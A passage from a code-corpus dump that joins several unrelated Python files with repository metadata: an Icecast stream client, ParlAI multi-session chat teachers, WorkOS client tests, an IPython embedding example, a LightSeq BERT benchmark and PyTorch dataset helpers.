metadatamode = False
readbuffer = ""
while 1:
yield 1
while self.dataReady("inbox"):
msg = self.recv("inbox")
if isinstance(msg, ParsedHTTPHeader):
metadatainterval = intval(msg.header["headers"].get("icy-metaint", 0))
if metadatainterval == None:
metadatainterval = 0
bytesUntilMetadata = metadatainterval
self.send(IceIPCHeader(msg.header["headers"].get("content-type")), "outbox")
print "Metadata interval is " + str(metadatainterval)
elif isinstance(msg, ParsedHTTPBodyChunk):
readbuffer += msg.bodychunk
elif isinstance(msg, ParsedHTTPEnd):
self.send(IceIPCDisconnected(), "outbox")
while len(readbuffer) > 0:
if metadatainterval == 0: #if no metadata
self.send(IceIPCDataChunk(readbuffer), "outbox")
readbuffer = ""
else:
chunkdata = readbuffer[0:bytesUntilMetadata]
if len(chunkdata) > 0:
self.send(IceIPCDataChunk(chunkdata), "outbox")
readbuffer = readbuffer[bytesUntilMetadata:]
bytesUntilMetadata -= len(chunkdata)
if len(readbuffer) > 0: #we must have some metadata (perhaps only partially complete) at the start
metadatalength = ord(readbuffer[0]) * 16 # they encode it as bytes / 16
if len(readbuffer) >= metadatalength + 1: # +1 for the length byte we just read. if we have all the metadata chunk
metadata = self.dictizeMetadata(readbuffer[1:metadatalength + 1])
self.send(IceIPCMetadata(metadata), "outbox")
bytesUntilMetadata = metadatainterval
readbuffer = readbuffer[metadatalength + 1:]
else:
break #we need more data before we can do anything
while self.dataReady("control"):
msg = self.recv("control")
if isinstance(msg, producerFinished) or isinstance(msg, shutdown):
return
self.pause()
class IcecastClient(SingleShotHTTPClient):
"""\
IcecastClient(starturl) -> Icecast/SHOUTcast MP3 streaming component
Arguments:
- starturl -- the URL of the stream
"""
def formRequest(self, url):
"""Overrides the standard HTTP request with an Icecast/SHOUTcast variant
which includes the icy-metadata header required to get metadata with the
stream"""
self.send("IcecastClient.formRequest()", "debug")
splituri = splitUri(url)
host = splituri["uri-server"]
if splituri.has_key("uri-port"):
host += ":" + splituri["uri-port"]
splituri["request"] = "GET " + splituri["raw-uri"] + " HTTP/1.1\r\n"
splituri["request"] += "Host: " + host + "\r\n"
splituri["request"] += "User-agent: Kamaelia Icecast Client 0.3 (RJL)\r\n"
splituri["request"] += "Connection: Keep-Alive\r\n"
splituri["request"] += "icy-metadata: 1\r\n"
splituri["request"] += "\r\n"
return splituri
def main(self):
while 1: #keep reconnecting
self.requestqueue.append(HTTPRequest(self.formRequest(self.starturl), 0))
while self.mainBody():
yield 1
class IcecastStreamRemoveMetadata(component):
def main(self):
while 1:
yield 1
while self.dataReady("inbox"):
msg = self.recv("inbox")
if isinstance(msg, IceIPCDataChunk):
self.send(msg.data, "outbox")
self.pause()
class IcecastStreamWriter(component):
Inboxes = {
"inbox" : "Icecast stream",
"control" : "UNUSED"
}
Outboxes = {
"outbox" : "UNUSED",
"signal" : "UNUSED"
}
def __init__(self, filename):
super(IcecastStreamWriter, self).__init__()
self.filename = filename
def main(self):
f = open(self.filename, "wb")
while 1:
yield 1
while self.dataReady("inbox"):
msg = self.recv("inbox")
if isinstance(msg, IceIPCDataChunk):
f.write(msg.data)
self.pause()
if __name__ == '__main__':
from Kamaelia.Util.PipelineComponent import pipeline
pipeline(
IcecastClient("http://64.236.34.97:80/stream/1049"),
IcecastDemux(),
IcecastStreamWriter("stream.mp3"),
).run()
| 35.202479 | 138 | 0.570959 |
0533cd3c4e8dbeae09e721a2a69d1a05cd17fede | 24,975 | py | Python | parlai/tasks/msc/agents.py | skywalker023/ParlAI | 70ee4a2c63008774fc9e66a8392847554920a14d | [
"MIT"
] | null | null | null | parlai/tasks/msc/agents.py | skywalker023/ParlAI | 70ee4a2c63008774fc9e66a8392847554920a14d | [
"MIT"
] | 2 | 2022-01-13T03:54:49.000Z | 2022-03-12T01:00:29.000Z | parlai/tasks/msc/agents.py | skywalker023/ParlAI | 70ee4a2c63008774fc9e66a8392847554920a14d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import DialogTeacher
from parlai.utils.io import PathManager
from parlai.core.opt import Opt
from parlai.utils.strings import normalize_reply
from parlai.core.teachers import MultiTaskTeacher
from .build import build
import os
import json
from typing import Optional
from parlai.core.params import ParlaiParser
import copy
import random
import math
from parlai.utils.logging import logger
from parlai.core.message import Message
from parlai.tasks.convai2.agents import NormalizedTeacherTrait, SelfOriginalTeacher
NOPERSONA = '__NO__PERSONA__BEAM__MIN__LEN__20__'
DUMMY_TEXT = '__SILENCE__'
def get_sessionbase_dir_path(opt, dpath, task_name):
assert task_name in ['msc_personasummary', 'msc_dialogue']
dpath = os.path.join(dpath, 'msc', task_name, f'session_{opt.get("session_id", 0)}')
return dpath
def get_predicted_summary_path(dpath, is_session_level=True):
if is_session_level:
return os.path.join(
dpath, 'msc', 'msc_dialogue', 'sessionlevel_summaries_subsample5.json'
)
else:
return os.path.join(dpath, 'msc', 'msc_dialogue', 'summaries_subsample5.json')
class SessionBasePersonaSummaryTeacher(DialogTeacher):
"""
Teacher that summarizes the persona lines.
"""
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
super().add_cmdline_args(parser, partial_opt)
agent = parser.add_argument_group('MSC Persona Summary Teacher options')
agent.add_argument('--session-id', type=int, default=1, help="session id")
agent.add_argument(
'--summary-num-turns',
type=int,
default=-1,
help="number of turns to infer persona",
)
agent.add_argument(
'--nopersona-subsampling-weight',
type=float,
default=1,
help="subampling ratio ",
)
return parser
def __init__(self, opt, shared=None):
self.summary_num_turns = opt['summary_num_turns']
assert (
self.summary_num_turns < 0 or self.summary_num_turns % 2 == 0
), "Please choose an even number for turns"
self.session_id = opt['session_id']
assert opt['session_id'] <= 4, f"No data beyong session {opt['session_id']}!"
assert (
opt['session_id'] <= 3 or 'train' not in opt['datatype']
), f"No train data beyong session {opt['session_id']}!"
self.nopersona_subsampling_weight = opt['nopersona_subsampling_weight']
if 'test' in opt['datatype']:
logger.warning(f'WARNING: Do not subsampling for {opt["datatype"]}')
self.nopersona_subsampling_weight = 1
assert (
self.nopersona_subsampling_weight >= 0
and self.nopersona_subsampling_weight <= 1
), "invalid subsampling weight"
dpath = build(opt)
opt['datafile'] = get_sessionbase_dir_path(opt, dpath, 'msc_personasummary')
self.id = f'msc_personasummary_{self.session_id}'
super().__init__(opt, shared)
def setup_data(self, data_path):
print('loading: ' + data_path)
if self.datatype.startswith('train'):
path_to_open = os.path.join(data_path, 'train.txt')
elif self.datatype.startswith('valid'):
path_to_open = os.path.join(data_path, 'valid.txt')
else:
path_to_open = os.path.join(data_path, 'test.txt')
with PathManager.open(path_to_open) as f:
raw_data = [json.loads(line.strip()) for line in f]
data = []
negative_data = []
for dialog_dict in raw_data:
current_episode = dialog_dict['dialog']
init_personachat = dialog_dict['init_personachat']
for end_idx in range(len(current_episode)):
if self.summary_num_turns > 0:
start_index = max(0, end_idx - self.summary_num_turns + 1)
else:
start_index = 0
end_line_persona = (
current_episode[end_idx]['persona_text']
if 'persona_text' in current_episode[end_idx]
else NOPERSONA
)
dialog_texts = [
current_episode[i]['text'] for i in range(start_index, end_idx + 1)
]
action = {
'id': self.id,
'text': '\n'.join(dialog_texts),
'labels': [end_line_persona],
'initial_data_id': dialog_dict['initial_data_id'],
'init_personas': init_personachat['init_personas'],
'utt_idx': end_idx,
'speaker_idx': end_idx % 2 + 1,
'session_id': self.session_id,
}
if end_line_persona == NOPERSONA:
negative_data.append(action)
else:
data.append(action)
size_to_sample = math.ceil(
self.nopersona_subsampling_weight * len(negative_data)
)
data.extend(random.sample(negative_data, size_to_sample))
random.shuffle(data)
for episode in data:
yield Message(episode), True
class SessionBaseMscTeacher(DialogTeacher):
"""
Teacher that generate text in the multi-session chat.
"""
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
super().add_cmdline_args(parser, partial_opt)
agent = parser.add_argument_group('Multi-Session Chat Task options')
agent.add_argument(
'--session-id',
type=int,
default=2,
help="session id, session_id = 1 refers to convai2 teacher and it's not supported here",
)
agent.add_argument(
'--previous-persona-type',
type=str,
default="raw_history",
choices=[
'none',
'goldsum_self',
'goldsum_both',
'goldsum_their',
'predsum_self',
'predsum_both',
'predsum_their',
'predsum_utt_self',
'predsum_utt_both',
'predsum_utt_their',
'init_self',
'init_both',
'init_their',
'raw_history',
],
help="type of previous context to include as context. "
"the 'goldsum_' prefix refers to gold persona summaries from crowdworkers; "
"the 'predsum_' prefix refers to predicted persona summaries from a summarization model; "
"the 'init_' prefix refers to the original persona lines used to ground the PersonaChat conversations. ",
)
agent.add_argument(
'--your-persona-first',
type=bool,
default=False,
help="whether to prepend your persona first or not",
)
agent.add_argument(
'--session-openning',
type=bool,
default=False,
help="whether to only include session opening or not",
)
agent.add_argument(
'--label-speaker-id',
type=str,
default="both",
choices=['self', 'both', 'their'],
help="the speaker id of the 'labels' field,",
)
agent.add_argument(
'--include-time-gap',
type=bool,
default=False,
help="whether to include time passed since last conversation in the context",
)
agent.add_argument(
'--history-time-gaps-token',
type=str,
default=None,
help="time tokens in the previous raw dialogue history, e.g. 'time:' ",
)
agent.add_argument(
'--history-person-tokens',
type=str,
default=None,
help="person tokens in the previous raw dialogue history, e.g. 'p1:,p2:' ",
)
agent.add_argument(
'--previous-session-delimiter',
type=str,
default=None,
help="delimiter between previous sessions in the context, such as '__NEXT_SESSION__' ",
)
return parser
def __init__(self, opt, shared=None):
assert opt['session_id'] <= 5, f"No data beyong session {opt['session_id']}!"
assert (
opt['session_id'] <= 4 or 'train' not in opt['datatype']
), f"No train data beyong session {opt['session_id']}!"
assert (
not opt['previous_persona_type'].startswith('predsum')
or opt['session_id'] <= 4
or (
opt['session_id'] == 5
and ('valid' in opt['datatype'] or 'test' in opt['datatype'])
)
), f"No predicted summary for session {opt['session_id']}"
self.previous_persona_type = opt['previous_persona_type']
self.session_openning = opt.get('session_openning', False)
if self.session_openning:
opt['label_speaker_id'] = 'their'
# NOTE: session_id = 1: personachat
self.session_id = opt['session_id']
self.label_speaker_id = opt["label_speaker_id"]
self.your_persona_first = opt['your_persona_first']
self.include_last_time_gap = opt['include_time_gap']
self.history_time_gaps_token = opt['history_time_gaps_token']
if self.history_time_gaps_token:
self.include_last_time_gap = False
self.history_person_tokens = opt['history_person_tokens']
self.use_predicted_summary = self.previous_persona_type.startswith('predsum')
self.previous_session_delimiter = opt.get('previous_session_delimiter', None)
if self.history_person_tokens is not None:
self.history_person_tokens = self.history_person_tokens.split(",")
self.msc_dpath = build(opt)
opt['datafile'] = get_sessionbase_dir_path(opt, self.msc_dpath, 'msc_dialogue')
self.id = f'msc_dialogue_{self.session_id}'
super().__init__(opt, shared)
def normalize_replies(self, x):
xs = [xt.strip() for xt in x.split('\n')]
xs2 = []
for x in xs:
if 'your persona:' in x:
# Normalize the sentence appearing after 'your persona:'
x = x[len('your persona: ') :]
x = normalize_reply(x)
x = 'your persona: ' + x
elif "partner's persona: " in x:
x = x[len("partner's persona: ") :]
x = normalize_reply(x)
x = "partner's persona: " + x
elif x != DUMMY_TEXT:
x = normalize_reply(x)
xs2.append(x)
return "\n".join(xs2)
def setup_data(self, datafile):
print('loading: ' + datafile)
if self.datatype.startswith('train'):
path_to_open = os.path.join(datafile, 'train.txt')
elif self.datatype.startswith('valid'):
path_to_open = os.path.join(datafile, 'valid.txt')
else:
path_to_open = os.path.join(datafile, 'test.txt')
with PathManager.open(path_to_open) as f:
raw_data = [json.loads(line.strip()) for line in f]
data = []
label_speaker_id_range = {}
predicted_summary_dict = {}
if self.use_predicted_summary:
is_session_level = not ('utt_' in self.previous_persona_type)
predsum_path = get_predicted_summary_path(self.msc_dpath, is_session_level)
logger.warning(f"use the predicted summary from {predsum_path}")
with PathManager.open(predsum_path) as jsonfile:
predicted_summary_dict = json.load(jsonfile)
def _get_time_gap(time_num, time_unit, time_token=""):
time_gap = str(time_num) + ' ' + time_unit
return f'{time_token} {time_gap}' if len(time_token) > 0 else time_gap
def _compile_persona_dialog_input(
dialog, personas, previous_dialogs, label_speaker_id
):
new_dialog = copy.deepcopy(dialog)
new_previous_dialogs = copy.deepcopy(previous_dialogs)
your_persona = ""
partner_persona = ""
if label_speaker_id == 'self':
your_persona = '\n'.join([f'your persona: {x}' for x in personas[1]])
partner_persona = '\n'.join(
[f"partner's persona: {x}" for x in personas[0]]
)
elif label_speaker_id == 'their':
your_persona = '\n'.join([f'your persona: {x}' for x in personas[0]])
partner_persona = '\n'.join(
[f"partner's persona: {x}" for x in personas[1]]
)
for prev_dialog in new_previous_dialogs:
prev_dialog['dialog'].insert(0, {"text": DUMMY_TEXT})
if len(prev_dialog['dialog']) % 2 == 1 and (
self.history_person_tokens is None
):
prev_dialog['dialog'].append({"text": DUMMY_TEXT})
new_dialog.insert(0, {"text": DUMMY_TEXT})
return your_persona, partner_persona, new_dialog, new_previous_dialogs
for dialog_dict in raw_data:
initial_data_id = dialog_dict['metadata']['initial_data_id']
if self.label_speaker_id == 'both':
label_speaker_id_range = ['their', 'self']
else:
label_speaker_id_range = [self.label_speaker_id]
for label_speaker_id in label_speaker_id_range:
if self.use_predicted_summary:
personas_to_complie = predicted_summary_dict[
str(self.session_id - 1)
][initial_data_id]
elif self.previous_persona_type.startswith('init'):
personas_to_complie = dialog_dict['init_personas']
else:
personas_to_complie = dialog_dict['personas']
(
your_persona,
partner_persona,
new_dialog,
new_previous_dialogs,
) = _compile_persona_dialog_input(
dialog_dict['dialog'],
personas_to_complie,
dialog_dict['previous_dialogs'],
label_speaker_id,
)
previous_sessions_msgs = []
if self.previous_persona_type == 'raw_history':
for d_id in range(len(new_previous_dialogs)):
previous_dialog_msg = [
x['text'] for x in new_previous_dialogs[d_id]['dialog']
]
if self.history_person_tokens:
previous_dialog_msg = [
self.history_person_tokens[i % 2] + ' ' + text
for i, text in enumerate(previous_dialog_msg)
if text != DUMMY_TEXT
]
if self.history_time_gaps_token:
time_gap_i = _get_time_gap(
new_previous_dialogs[d_id]['time_num'],
new_previous_dialogs[d_id]['time_unit'],
time_token=self.history_time_gaps_token,
)
previous_sessions_msgs.append(
'\n'.join(previous_dialog_msg + [time_gap_i])
)
else:
previous_sessions_msgs.append(
'\n'.join(previous_dialog_msg)
)
if self.previous_session_delimiter is not None:
previous_sessions_msgs = [
val
for pair in zip(
previous_sessions_msgs,
[self.previous_session_delimiter]
* len(previous_sessions_msgs),
)
for val in pair
]
previous_sessions_msgs = '\n'.join(previous_sessions_msgs)
episode = []
for i in range(0, len(new_dialog) - 1, 2):
text = new_dialog[i]['text']
partner_persona_one_line = partner_persona.replace('\n', '').split(
"partner's persona: "
)
your_persona_one_line = your_persona.replace('\n', '').split(
"your persona: "
)
action = {
'id': self.id,
'text': self.normalize_replies(text),
'labels': [self.normalize_replies(new_dialog[i + 1]['text'])],
'session_id': self.session_id,
'initial_data_id': initial_data_id,
'personas': f'{partner_persona}\n{your_persona}',
'personas_one_line': f"partner's persona: {' '.join(partner_persona_one_line)}\nyour persona: {' '.join(your_persona_one_line)}",
}
episode.append(action)
if self.session_openning:
break
persona_context_str = ""
if 'self' in self.previous_persona_type:
persona_context_str = your_persona
elif 'their' in self.previous_persona_type:
persona_context_str = partner_persona
elif 'both' in self.previous_persona_type:
if self.your_persona_first:
persona_context_str = (
(your_persona + '\n') if len(your_persona) > 0 else ""
) + partner_persona
else:
persona_context_str = (
(partner_persona + '\n') if len(partner_persona) > 0 else ""
) + your_persona
elif self.previous_persona_type == 'raw_history':
persona_context_str = previous_sessions_msgs
if self.include_last_time_gap:
time_gap = _get_time_gap(
dialog_dict['previous_dialogs'][-1]['time_num'],
dialog_dict['previous_dialogs'][-1]['time_unit'],
)
persona_context_str = (
(persona_context_str + '\n')
if len(persona_context_str) > 0
else ""
) + f'[{time_gap}]'
if persona_context_str and len(persona_context_str) > 0:
episode[0]['text'] = persona_context_str + '\n' + episode[0]['text']
data.append(episode)
for episode in data:
start_idx = 0
for i, turn in enumerate(episode):
yield Message(turn), i == start_idx
class PersonaSummaryTeacher(MultiTaskTeacher):
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
super().add_cmdline_args(parser, partial_opt)
parser = parser.add_argument_group('MSC Summary Teacher Args')
parser.add_argument(
'--include-last-session',
type=bool,
default=False,
help="whether to include session 4 for valid and test splits",
)
SessionBasePersonaSummaryTeacher.add_cmdline_args(parser, partial_opt)
return parser
def __init__(self, opt, shared=None):
msc_tasks = [
'msc:SessionBasePersonaSummary:session_id=1',
'msc:SessionBasePersonaSummary:session_id=2',
'msc:SessionBasePersonaSummary:session_id=3',
]
if opt.get('include_last_session', False) and 'train' not in opt['datatype']:
msc_tasks += ['msc:SessionBasePersonaSummary:session_id=4']
opt = copy.deepcopy(opt)
opt['task'] = ','.join(msc_tasks)
super().__init__(opt, shared)
class Session1NormalizedTrait(NormalizedTeacherTrait):
"""
Trait for flatten persona into one line.
"""
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
super().add_cmdline_args(parser, partial_opt)
agent = parser.add_argument_group('Session Level NormalizedTeacher arguments')
agent.add_argument(
'--is-convai2-session-level',
type=bool,
default=False,
help="whether to flatten the persona lines into a single persona line per speaker",
)
return agent
def __init__(self, opt, shared=None):
self.is_convai2_session_level = opt.get('is_convai2_session_level', False)
super().__init__(opt, shared)
def normalize_replies(self, x):
xs = x.split('\n')
your_personas = []
partner_personas = []
non_personas = []
for x in xs:
if x.startswith('your persona: '):
# Normalize the sentence appearing after 'your persona:'
x = x[len('your persona: ') :]
x = normalize_reply(x)
your_personas.append(x)
elif x.startswith("partner's persona: "):
x = x[len("partner's persona: ") :]
x = normalize_reply(x)
partner_personas.append(x)
else:
x = normalize_reply(x)
non_personas.append(x)
xs2 = []
if not self.is_convai2_session_level:
your_personas = ['your persona: ' + yx for yx in your_personas]
partner_personas = ["partner's persona: " + px for px in partner_personas]
else:
if your_personas:
your_personas = ['your persona: ' + " ".join(your_personas)]
if partner_personas:
partner_personas = ["partner's persona: " + " ".join(partner_personas)]
if self.your_persona_first:
xs2.extend(your_personas)
xs2.extend(partner_personas)
else:
xs2.extend(partner_personas)
xs2.extend(your_personas)
xs2.extend(non_personas)
return '\n'.join(xs2)
class Session1SelfTeacher(Session1NormalizedTrait, SelfOriginalTeacher):
"""
Convai2 as Session 1.
"""
pass
class MscTeacher(MultiTaskTeacher):
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
super().add_cmdline_args(parser, partial_opt)
parser = parser.add_argument_group('Multi Session Chat (MSC) Teacher Args')
parser.add_argument(
'--include-session1',
type=bool,
default=True,
help="whether to include session 1 (convai2:normalized)",
)
parser.add_argument(
'--include-last-session',
type=bool,
default=False,
help="whether to include session 5",
)
SessionBaseMscTeacher.add_cmdline_args(parser, partial_opt)
Session1SelfTeacher.add_cmdline_args(parser, partial_opt)
return parser
def __init__(self, opt, shared=None):
msc_tasks = [
'msc:SessionBaseMsc:session_id=2',
'msc:SessionBaseMsc:session_id=3',
'msc:SessionBaseMsc:session_id=4',
]
if opt.get('include_session1', False) and not opt['session_openning']:
if opt['previous_persona_type'] in [
'predsum_self',
'predsum_both',
'predsum_their',
]:
msc_tasks = [
'msc:Session1Self:is_convai2_session_level=True'
] + msc_tasks
else:
msc_tasks = [
'msc:Session1Self:is_convai2_session_level=False'
] + msc_tasks
if opt.get('include_last_session', False) and 'train' not in opt['datatype']:
msc_tasks += ['msc:SessionBaseMsc:session_id=5']
opt = copy.deepcopy(opt)
opt['task'] = ','.join(msc_tasks)
super().__init__(opt, shared)
class DefaultTeacher(MscTeacher):
pass
| 40.347334 | 153 | 0.552312 |
601099085405113a5b4a6c114a5a5d070e63e06f | 2,790 | py | Python | tests/test_client.py | ihorizonUK/workos-python | 80ec96d9c4ed3f2539946a19ad9c9b59ac6ee023 | [
"MIT"
] | 13 | 2020-03-18T20:38:32.000Z | 2022-03-02T20:23:42.000Z | tests/test_client.py | ihorizonUK/workos-python | 80ec96d9c4ed3f2539946a19ad9c9b59ac6ee023 | [
"MIT"
] | 71 | 2020-02-27T03:53:40.000Z | 2022-03-11T16:54:14.000Z | tests/test_client.py | ihorizonUK/workos-python | 80ec96d9c4ed3f2539946a19ad9c9b59ac6ee023 | [
"MIT"
] | 5 | 2020-10-29T22:38:41.000Z | 2022-02-20T21:12:58.000Z | import pytest
from workos import client
from workos.exceptions import ConfigurationException
class TestClient(object):
@pytest.fixture(autouse=True)
def setup(self):
client._audit_trail = None
client._directory_sync = None
client._organizations = None
client._passwordless = None
client._portal = None
client._sso = None
def test_initialize_sso(self, set_api_key_and_client_id):
assert bool(client.sso)
def test_initialize_audit_log(self, set_api_key):
assert bool(client.audit_trail)
def test_initialize_directory_sync(self, set_api_key):
assert bool(client.directory_sync)
def test_initialize_organizations(self, set_api_key):
assert bool(client.organizations)
def test_initialize_passwordless(self, set_api_key):
assert bool(client.passwordless)
def test_initialize_portal(self, set_api_key):
assert bool(client.portal)
def test_initialize_sso_missing_api_key(self, set_client_id):
with pytest.raises(ConfigurationException) as ex:
client.sso
message = str(ex)
assert "api_key" in message
assert "client_id" not in message
def test_initialize_sso_missing_client_id(self, set_api_key):
with pytest.raises(ConfigurationException) as ex:
client.sso
message = str(ex)
assert "client_id" in message
assert "api_key" not in message
def test_initialize_sso_missing_api_key_and_client_id(self):
with pytest.raises(ConfigurationException) as ex:
client.sso
message = str(ex)
assert all(setting in message for setting in ("api_key", "client_id",))
def test_initialize_audit_trail_missing_api_key(self):
with pytest.raises(ConfigurationException) as ex:
client.audit_trail
message = str(ex)
assert "api_key" in message
def test_initialize_directory_sync_missing_api_key(self):
with pytest.raises(ConfigurationException) as ex:
client.directory_sync
message = str(ex)
assert "api_key" in message
def test_initialize_organizations_missing_api_key(self):
with pytest.raises(ConfigurationException) as ex:
client.organizations
message = str(ex)
assert "api_key" in message
def test_initialize_passwordless_missing_api_key(self):
with pytest.raises(ConfigurationException) as ex:
client.passwordless
message = str(ex)
assert "api_key" in message
def test_initialize_portal_missing_api_key(self):
with pytest.raises(ConfigurationException) as ex:
client.portal
message = str(ex)
assert "api_key" in message
| 27.9 | 79 | 0.687097 |
4b2e7358aad0ca0f81d0bcd5fbe78cf73b54a6e2 | 1,927 | py | Python | build/env/lib/python2.7/site-packages/ipython-0.10-py2.7.egg/share/doc/ipython/examples/core/example-embed-short.py | lumanjiao/XLS_BigData | 2c4c37872b8636df1c8b0e005bc12a635a753c7a | [
"Apache-2.0"
] | 11 | 2019-03-20T07:38:35.000Z | 2021-06-18T09:42:46.000Z | docs/examples/core/example-embed-short.py | 08saikiranreddy/ipython | 3498382180ad409592f46a9dd0d190ca917bfbff | [
"BSD-3-Clause-Clear"
] | 1 | 2015-07-16T22:26:53.000Z | 2015-07-16T22:26:53.000Z | docs/examples/core/example-embed-short.py | 08saikiranreddy/ipython | 3498382180ad409592f46a9dd0d190ca917bfbff | [
"BSD-3-Clause-Clear"
] | 5 | 2019-06-29T03:13:02.000Z | 2020-04-23T04:47:11.000Z | """Quick code snippets for embedding IPython into other programs.
See example-embed.py for full details, this file has the bare minimum code for
cut and paste use once you understand how to use the system."""
#---------------------------------------------------------------------------
# This code loads IPython but modifies a few things if it detects it's running
# embedded in another IPython session (helps avoid confusion)
try:
__IPYTHON__
except NameError:
argv = ['']
banner = exit_msg = ''
else:
# Command-line options for IPython (a list like sys.argv)
argv = ['-pi1','In <\\#>:','-pi2',' .\\D.:','-po','Out<\\#>:']
banner = '*** Nested interpreter ***'
exit_msg = '*** Back in main IPython ***'
# First import the embeddable shell class
from IPython.Shell import IPShellEmbed
# Now create the IPython shell instance. Put ipshell() anywhere in your code
# where you want it to open.
ipshell = IPShellEmbed(argv,banner=banner,exit_msg=exit_msg)
#---------------------------------------------------------------------------
# This code will load an embeddable IPython shell always with no changes for
# nested embededings.
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed()
# Now ipshell() will open IPython anywhere in the code.
#---------------------------------------------------------------------------
# This code loads an embeddable shell only if NOT running inside
# IPython. Inside IPython, the embeddable shell variable ipshell is just a
# dummy function.
try:
__IPYTHON__
except NameError:
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed()
# Now ipshell() will open IPython anywhere in the code
else:
# Define a dummy ipshell() so the same code doesn't crash inside an
# interactive IPython
def ipshell(): pass
#******************* End of file <example-embed-short.py> ********************
| 37.057692 | 78 | 0.609237 |
baa00a3c2a658318940fc026e380e597ed431470 | 3,625 | py | Python | examples/inference/python/test/ls_bert.py | hexisyztem/lightseq | 25265dabaaee42ee9e7b7ec43c8c04fb90292733 | [
"Apache-2.0"
] | 106 | 2019-12-06T09:02:58.000Z | 2020-09-09T07:12:21.000Z | examples/inference/python/test/ls_bert.py | hexisyztem/lightseq | 25265dabaaee42ee9e7b7ec43c8c04fb90292733 | [
"Apache-2.0"
] | null | null | null | examples/inference/python/test/ls_bert.py | hexisyztem/lightseq | 25265dabaaee42ee9e7b7ec43c8c04fb90292733 | [
"Apache-2.0"
] | 15 | 2019-12-09T05:44:28.000Z | 2020-09-04T03:43:56.000Z | import time
import argparse
import torch
import lightseq.inference as lsi
from transformers import BertTokenizer, BertForSequenceClassification
def ls_bert(model, inputs, attn_mask):
torch.cuda.synchronize()
start_time = time.perf_counter()
ls_output = model.infer(inputs, attn_mask)
torch.cuda.synchronize()
end_time = time.perf_counter()
return ls_output, end_time - start_time
def hf_bert(model, inputs, attn_mask):
torch.cuda.synchronize()
start_time = time.perf_counter()
hf_output = model(inputs.to("cuda:0"), attention_mask=attn_mask.to("cuda:0"))
torch.cuda.synchronize()
end_time = time.perf_counter()
return hf_output, end_time - start_time
def ls_generate(model, inputs_id, attn_mask):
print("=========lightseq=========")
print("lightseq generating...")
ls_output, ls_time = ls_bert(model, inputs_id, attn_mask)
print(f"lightseq time: {ls_time}s")
print("lightseq results (class predictions):")
print(ls_output.argmax(axis=1).detach().cpu().numpy())
def hf_generate(model, inputs_id, attn_mask):
print("=========huggingface=========")
print("huggingface generating...")
hf_output, hf_time = hf_bert(model, inputs_id, attn_mask)
print(f"huggingface time: {hf_time}s")
print("huggingface results (class predictions):")
print(hf_output.logits.argmax(axis=1).detach().cpu().numpy())
def warmup(tokenizer, ls_model, hf_model, sentences):
inputs = tokenizer(sentences, return_tensors="pt", padding=True)
inputs_id = inputs["input_ids"]
attn_mask = inputs["attention_mask"]
ls_generate(ls_model, inputs_id, attn_mask)
hf_generate(hf_model, inputs_id, attn_mask)
class LightseqBertClassification:
def __init__(self, ls_weight_path, hf_model):
self.ls_bert = lsi.Bert(ls_weight_path, 128)
self.pooler = hf_model.bert.pooler
self.classifier = hf_model.classifier
def infer(self, inputs, attn_mask):
last_hidden_states = self.ls_bert.infer(inputs)
last_hidden_states = torch.Tensor(last_hidden_states).float()
pooled_output = self.pooler(last_hidden_states.to("cuda:0"))
logits = self.classifier(pooled_output)
return logits
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--user_input", action="store_true")
args = parser.parse_args()
print("initializing bert tokenizer...")
tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
print("creating huggingface model...")
hf_model = BertForSequenceClassification.from_pretrained("bert-base-uncased")
hf_model.to("cuda:0")
hf_model.eval()
print("creating lightseq model...")
ls_model = LightseqBertClassification("lightseq_bert_base_uncased.hdf5", hf_model)
sentences = [
"Hello, my dog is cute",
"Hey, how are you",
"This is a test",
"Testing the model again",
]
print("====================START warmup====================")
warmup(tokenizer, ls_model, hf_model, sentences)
print("====================END warmup====================")
while True:
if args.user_input:
sentences = [input("input the masked sentence:\n")]
print("tokenizing the sentences...")
inputs = tokenizer(sentences, return_tensors="pt", padding=True)
inputs_id = inputs["input_ids"]
attn_mask = inputs["attention_mask"]
ls_generate(ls_model, inputs_id, attn_mask)
hf_generate(hf_model, inputs_id, attn_mask)
if not args.user_input:
break
if __name__ == "__main__":
main()
| 32.079646 | 86 | 0.670621 |
bbf1146cea0379d8aa5f4bdf3e9a2b009a116e7e | 6,338 | py | Python | dataset.py | SolitaryKnife/pytorch_dataset | 36773064b333d0aafc1c5d0e559271c56516afe7 | [
"MIT"
] | null | null | null | dataset.py | SolitaryKnife/pytorch_dataset | 36773064b333d0aafc1c5d0e559271c56516afe7 | [
"MIT"
] | null | null | null | dataset.py | SolitaryKnife/pytorch_dataset | 36773064b333d0aafc1c5d0e559271c56516afe7 | [
"MIT"
] | null | null | null | from torch.utils.data.dataset import *
class ValueDataset(Dataset):
__slots__ = ["values", "transform"]
def __init__(self, values, transform=None):
assert callable(getattr(values, "__len__", None))
assert callable(getattr(values, "__getitem__", None))
assert callable(transform) or transform is None
self.values = values
self.transform = transform
def __len__(self):
return len(self.values)
def __getitem__(self, idx):
value = self.values[idx]
if self.transform is None:
return value
return self.transform(value)
class ValueIterableDataset(IterableDataset):
__slots__ = ["values", "transform"]
def __init__(self, values, transform=None):
from collections import Iterable
assert isinstance(values, Iterable)
assert callable(transform) or transform is None
self.values = values
self.transform = transform
@staticmethod
def generator(values, transform):
if transform is None:
transform = (lambda x: x)
for v in values:
yield transform(v)
def __iter__(self):
return self.generator(self.values, self.transform)
class ZipDataset(Dataset):
__slots__ = ["datasets", "zip_transform"]
def __init__(self, datasets, zip_transform=None):
assert len(datasets) > 0
assert all([callable(getattr(ds, "__len__", None)) for ds in datasets])
assert all([callable(getattr(ds, "__getitem__", None)) for ds in datasets])
assert callable(zip_transform) or zip_transform is None
self.datasets = datasets
